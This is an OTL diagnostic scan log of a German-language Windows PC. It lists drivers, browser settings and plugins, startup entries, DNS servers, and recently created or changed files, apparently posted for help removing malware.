DRV:64bit: - [2009.06.10 22:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009.06.10 22:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008.06.27 08:51:10 | 000,088,632 | ---- | M] (Adobe Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\adfs.sys -- (adfs)
DRV:64bit: - [2008.05.15 02:28:00 | 000,026,624 | ---- | M] (Atheros Communications, Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\jswpslwfx.sys -- (JSWPSLWF)
DRV:64bit: - [2007.01.19 18:24:24 | 000,025,312 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\SCMNdisP.sys -- (SCMNdisP)
DRV - [2012.07.13 16:13:14 | 000,070,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Microsoft Visual Studio 11.0\Team Tools\Performance Tools\x64\VSPerfDrv110.sys -- (VSPerfDrv110)
DRV - [2011.03.21 17:44:28 | 000,088,200 | ---- | M] (Locktime Software) [Kernel | System | Running] -- C:\Programme\NetLimiter 3\nltdi.sys -- (nltdi)
DRV - [2009.07.14 03:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = 
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = 
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de-DE
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 70 7A D7 B7 BB B6 CD 01  [binary data]
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = 127.0.0.1:80
 
========== FireFox ==========
 
FF - prefs.js..browser.search.selectedEngine: "eBay"
FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/ig"
FF - prefs.js..extensions.enabledAddons: %7BD4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389%7D:0.9.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:21.0
FF - prefs.js..network.proxy.autoconfig_url: "data:text/javascript,function%20FindProxyForURL(url%2C%20host)%20%7Bif%20(host%20%3D%3D%20'www.pandora.com'%20%7C%7C%20url.indexOf('southparkstudios.com')%20!%3D%20-1%20%7C%7C%20host%20%3D%3D%20's.hulu.com'%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fsecure.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.iheart.com*')%20%7C%7C%20(url.indexOf('proxmate%3Dactive')%20!%3D%20-1%20%26%26%20url.indexOf('amazonaws.com')%20%3D%3D%20-1)%20%7C%7C%20(url.indexOf('proxmate%3Dus')%20!%3D%20-1)%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fsongza.com*')%20%7C%7C%20url.indexOf('discoverymedia.com')%20!%3D%20-1%20%7C%7C%20(url.indexOf('turntable.fm')%20!%3D%20-1%20%26%26%20url.indexOf('static.turntable.fm')%20%3D%3D%20-1%20%26%26%20url.indexOf('s3.amazonaws.com')%20%3D%3D%20-1%20%26%26%20url.indexOf('ping.chartbeat.net')%20%3D%3D%20-1)%20%7C%7C%20url.indexOf('vevo.com')%20!%3D%20-1%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fgrooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fretro.grooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.mtv.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fmedia.mtvnservices.com*')%20%7C%7C%20url.indexOf('play.google.com')%20!%3D%20-1%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.crunchyroll.com*'))%20%7B%20return%20'PROXY%20ab-us13.personalitycores.com%3A8000%3B%20PROXY%20ab-us02.personalitycores.com%3A8000%3B%20PROXY%20ab-us07.personalitycores.com%3A8000%3B%20PROXY%20ab-us12.personalitycores.com%3A8000%3B%20PROXY%20ab-us11.personalitycores.com%3A8000%3B%20PROXY%20ab-us15.personalitycores.com%3A8000%3B%20PROXY%20ab-us01.personalitycores.com%3A8000%3B%20PROXY%20ab-us03.personalitycores.com%3A8000%3B%20PROXY%20ab-us14.personalitycores.com%3A8000%3B%20PROXY%20ab-us10.personalitycores.com%3A8000%3B%20PROXY%20ab-us08.personalitycores.com%3A8000%3B%20PROXY%20ab-us09.personalitycores.com%3A8000'%3B%7D%20%20else%20%7B%20return%20'DIRECT'%3B%20%7D%7D"
FF - prefs.js..network.proxy.backup.ftp: ""
FF - prefs.js..network.proxy.backup.ftp_port: ""
FF - prefs.js..network.proxy.backup.socks: ""
FF - prefs.js..network.proxy.backup.socks_port: ""
FF - prefs.js..network.proxy.backup.ssl: ""
FF - prefs.js..network.proxy.backup.ssl_port: ""
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_202.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.9.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.9.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.21.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@raidcall.en/RCplugin: d:\Users\Dani\AppData\Roaming\raidcall\plugins\nprcplugin.dll (Raidcall)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 21.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 21.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.06.05 20:31:46 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 21.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 21.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.06.05 20:31:46 | 000,000,000 | ---D | M]
 
[2012.08.10 00:15:18 | 000,000,000 | ---D | M] (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\Extensions
[2013.06.06 00:31:56 | 000,000,000 | ---D | M] (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\Firefox\Profiles\7qmo9taz.default\extensions
[2013.05.08 21:00:25 | 000,870,680 | ---- | M] () (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2012.08.24 16:37:16 | 000,434,392 | ---- | M] () (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\{D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}.xpi
[2013.05.23 18:35:24 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\browser\extensions
[2013.05.23 18:35:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll
CHR - plugin: Intel\u00AE Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
CHR - plugin: Intel\u00AE Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
CHR - plugin: Java(TM) Platform SE 7 U21 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll
CHR - plugin: NVIDIA 3D Vision (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
CHR - plugin: NVIDIA 3D VISION (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll
CHR - plugin: Windows Activation Technologies (Enabled) = C:\Windows\system32\Wat\npWatWeb.dll
CHR - plugin: Raidcall plugin (Enabled) = d:\Users\Dani\AppData\Roaming\raidcall\plugins\nprcplugin.dll
CHR - Extension: Google Docs = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Google Docs = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\
CHR - Extension: Google Drive = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: YouTube = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google-Suche = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: Google-Suche = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Google Mail = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
 
O1 HOSTS File: ([2013.06.05 16:23:30 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Microsoft Web Test Recorder 10.0 Helper) - {876d9f09-c6d6-4324-a2cc-04dd9a4de12f} - C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AdobeCS4ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)
O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [NetLimiter] C:\Program Files\NetLimiter 3\NLClientApp.exe (Locktime Software)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableSecureUIAPath = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..Trusted Domains: line6.net ([]* in Trusted sites)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 88.208.58.166 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{35ABAE31-17B1-48E1-A4F7-A319F6F08AF3}: DhcpNameServer = 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F9DE9B3B-D6F4-44C4-9ABA-AE230A8CDF98}: DhcpNameServer = 88.208.58.166 192.168.1.1
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2010.07.10 06:33:52 | 000,000,000 | R--D | M] - E:\autorun -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2013.06.11 15:17:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe
[2013.06.06 00:34:57 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2013.06.05 23:34:26 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2013.06.05 16:22:31 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2013.06.05 16:18:29 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2013.06.04 17:59:25 | 000,000,000 | ---D | C] -- d:\ProgramData\Spybot - Search & Destroy
[2013.05.23 18:42:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\Heroes of Umbra
[2013.05.23 18:35:07 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2013.05.22 23:09:24 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0
[2013.05.19 17:09:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\BattlEye
[2013.05.19 17:02:46 | 000,000,000 | ---D | C] -- d:\ProgramData\Bohemia Interactive Studio
[2013.05.19 16:43:25 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\DayZCommander
[2013.05.19 16:43:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Dotjosh Studios
[2013.05.19 16:33:35 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\ArmA 2 OA
[2013.05.19 16:32:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\Documents\ArmA 2
[2013.05.19 16:32:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\ArmA 2
[2013.05.19 16:32:17 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bohemia Interactive
[2013.05.18 18:12:50 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\6px
[2013.05.15 21:13:50 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Roaming\Malwarebytes
[2013.05.15 21:13:39 | 000,000,000 | ---D | C] -- d:\ProgramData\Malwarebytes
[2013.05.15 21:13:38 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2013.05.15 21:13:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2013.05.14 19:47:20 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\kryonet-2.20
 
========== Files - Modified Within 30 Days ==========
 
[2013.06.11 15:21:05 | 000,022,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2013.06.11 15:21:05 | 000,022,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2013.06.11 15:18:58 | 001,620,612 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2013.06.11 15:18:58 | 000,699,416 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat
[2013.06.11 15:18:58 | 000,654,254 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2013.06.11 15:18:58 | 000,149,556 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat
[2013.06.11 15:18:58 | 000,122,126 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2013.06.11 15:17:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe
[2013.06.11 15:17:00 | 000,001,106 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2013.06.11 15:13:36 | 000,001,102 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2013.06.11 15:13:04 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2013.06.07 15:09:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2013.06.06 00:42:15 | 000,007,604 | ---- | M] () -- d:\Users\Dani\AppData\Local\Resmon.ResmonCfg
[2013.06.05 20:19:02 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2013.06.05 16:23:30 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2013.06.04 18:03:55 | 000,448,539 | R--- | M] () -- C:\Windows\SysNative\drivers\etc\hosts.20130604-191031.backup
[2013.05.23 18:44:01 | 000,005,906 | ---- | M] () -- d:\Users\Dani\Desktop\grasfield.png
[2013.05.23 18:44:01 | 000,001,390 | ---- | M] () -- d:\Users\Dani\Desktop\grasfield.pack
[2013.05.22 23:07:35 | 007,465,366 | ---- | M] () -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0.zip
[2013.05.22 17:55:02 | 007,810,128 | ---- | M] () -- d:\Users\Dani\Desktop\Silverstein - Smashed Into Pieces (2013).mp3
[2013.05.21 20:25:10 | 003,147,197 | ---- | M] () -- d:\Users\Dani\Desktop\Element Eighty - Broken Promises.mp3
[2013.05.21 15:26:46 | 000,000,219 | ---- | M] () -- d:\Users\Dani\Desktop\Dota 2.url
[2013.05.21 01:09:04 | 000,025,185 | ---- | M] () -- C:\Windows\SysWow64\ieuinit.inf
[2013.05.21 01:09:03 | 000,025,185 | ---- | M] () -- C:\Windows\SysNative\ieuinit.inf
[2013.05.21 01:06:16 | 001,593,956 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013.05.20 14:14:10 | 000,047,198 | ---- | M] () -- d:\Users\Dani\Desktop\Kurzfassung.zip
[2013.05.19 03:23:43 | 002,895,824 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2013.05.18 02:10:32 | 009,514,359 | ---- | M] () -- d:\Users\Dani\Desktop\hiero.jar
[2013.05.16 20:58:49 | 017,698,934 | ---- | M] () -- d:\Users\Dani\Desktop\Medienprojekt_Backup.zip
[2013.05.14 19:39:38 | 002,005,341 | ---- | M] () -- d:\Users\Dani\Desktop\kryonet-2.20.zip
 
========== Files Created - No Company Name ==========
 
[2013.06.05 20:19:00 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2013.05.23 18:44:01 | 000,005,906 | ---- | C] () -- d:\Users\Dani\Desktop\grasfield.png
[2013.05.23 18:44:01 | 000,001,390 | ---- | C] () -- d:\Users\Dani\Desktop\grasfield.pack
[2013.05.22 23:07:24 | 007,465,366 | ---- | C] () -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0.zip
[2013.05.22 17:54:57 | 007,810,128 | ---- | C] () -- d:\Users\Dani\Desktop\Silverstein - Smashed Into Pieces (2013).mp3
[2013.05.21 20:25:10 | 003,147,197 | ---- | C] () -- d:\Users\Dani\Desktop\Element Eighty - Broken Promises.mp3
[2013.05.21 15:26:46 | 000,000,219 | ---- | C] () -- d:\Users\Dani\Desktop\Dota 2.url
[2013.05.21 01:09:04 | 000,025,185 | ---- | C] () -- C:\Windows\SysWow64\ieuinit.inf
[2013.05.21 01:09:03 | 000,025,185 | ---- | C] () -- C:\Windows\SysNative\ieuinit.inf
[2013.05.20 14:14:01 | 000,047,198 | ---- | C] () -- d:\Users\Dani\Desktop\Kurzfassung.zip
